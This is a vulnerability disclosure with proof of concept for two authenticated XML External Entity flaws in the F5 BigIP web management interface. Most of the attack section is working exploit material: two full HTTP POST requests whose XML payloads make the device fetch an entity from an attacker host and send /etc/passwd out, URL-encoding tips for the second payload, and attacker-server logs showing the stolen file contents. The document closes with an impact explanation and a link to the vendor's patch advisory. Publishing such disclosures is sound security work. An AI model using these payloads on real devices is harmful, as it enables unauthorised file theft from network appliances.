F5 BigIP XXE Vulnerabilities (CVE-2014-6032 and CVE-2014-6033)

F5 BigIP XXE Vulnerabilities (CVE-2014-6032 and CVE-2014-6033) - Authenticated

Vulnerable Systems:

Description:

It was established that the web application was vulnerable to an XML External Entity injection attack.

POC #1:

The vulnerable URL is redacted due to the number of affected systems.
The following xml payload was used to trigger the XXE.

POST /tmui/deal HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 212
Content-Type: application/xml; charset=UTF-8
Cookie: JSESSIONID=4E6247F892F0068DF87C57D5CFAEF5D1; BIGIPAuthCookie=EB9425D2D7B6B954BACBCEA4082343FCBB095616; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5_refreshpage=/tmui/Control/jspmap/tmui/system/user/properties.jsp%3Fname%3Dadmin; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay="/tmui/system/settings/properties.jsp?.configuration_table"; f5formpage="/tmui/system/sw_updates/hotfix_list.jsp?&"
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;
%int;
%trick;]>
<deal type="request" id="1"><card type="query" id="1"/></deal>
On the attacker Server the file can be read from web server logs:
10.1.10.10 - - [20/Aug/2014:00:17:44 PDT] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128
- -> /xml?f=/etc/passwd
10.1.10.10 - - [20/Aug/2014 00:17:44] "GET /?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Adaemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nologin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spool/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0Aoperator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sbin/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/local/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nologin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfile:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapper%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/share/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0013

POC #2: Please note that the contents parameter needs to be fully url encoded.

POST /tmui/dashboard/viewset.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=4E6247F892F0068DF87C57D5CFAEF5D1; BIGIPAuthCookie=EB9425D2D7B6B954BACBCEA4082343FCBB095616; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION="[All]"; f5_refreshpage="https%3A//192.168.235.216/tmui/Control/jspmap/tmui/system/memory/stats.jsp%3F"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay="/tmui/system/settings/properties.jsp?.configuration_table,/tmui/locallb/monitor/properties.jsp?name=/Common/http.configuration_table"; f5formpage="/tmui/overview/welcome/introduction.jsp?about=true&about=true"
Connection: keep-alive
Referer: https://x.x.x.x/tmui/dashboard/MonitorDashboardModule.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 1810

action=write&contents=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;
%int;
%trick;]><viewList>
  <view id="asd">
    <window>
      <setting name="x" value="0"/>
      <setting name="height" value="256"/>
      <setting name="y" value="190"/>
      <setting name="typeId" value="BwControlTemplWindow"/>
      <setting name="selectedMode" value="Both"/>
      <setting name="width" value="508"/>
    </window>
    <window>
      <setting name="x" value="515"/>
      <setting name="height" value="256"/>
      <setting name="toggleOn" value="true"/>
      <setting name="y" value="0"/>
      <setting name="typeId" value="MemWindow"/>
      <setting name="selectedMode" value="Both"/>
      <setting name="width" value="508"/>
      <setting name="viewSwitch" value="false"/>
    </window>
  </view>
</viewList>&name=asdasd
Please note that the payload needs to be completely urlencoded to trigger properly.

On the attacker Server the file can be read from web server logs:
10.1.10.10 - - [20/Aug/2014 00:37:18] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128 0.0008
10.1.10.10 - - [20/Aug/2014:00:37:18 PDT] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128
- -> /xml?f=/etc/passwd
10.1.10.10 - - [20/Aug/2014 00:37:18] "GET /?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Adaemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nologin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spool/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0Aoperator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sbin/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/local/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nologin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfile:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapper%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/share/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0010

Impact:

XML External Entity injection vulnerabilities arise due to the XML specification allowing XML documents to define entities that reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. In addition, external entities can reference files on the parser's filesystem, and exploiting this may allow the retrieval of arbitrary files or the causing of a Denial of Service condition (by making the server read from a file such as `/dev/random').
External entities can also reference URLs, potentially allowing port scanning from the XML parser's host, or the retrieval of sensitive web content that would otherwise be inaccessible due to network topology 
and defenses.

Recommendation:

Please see F5’s advisory for patch details.
http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15605.html

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.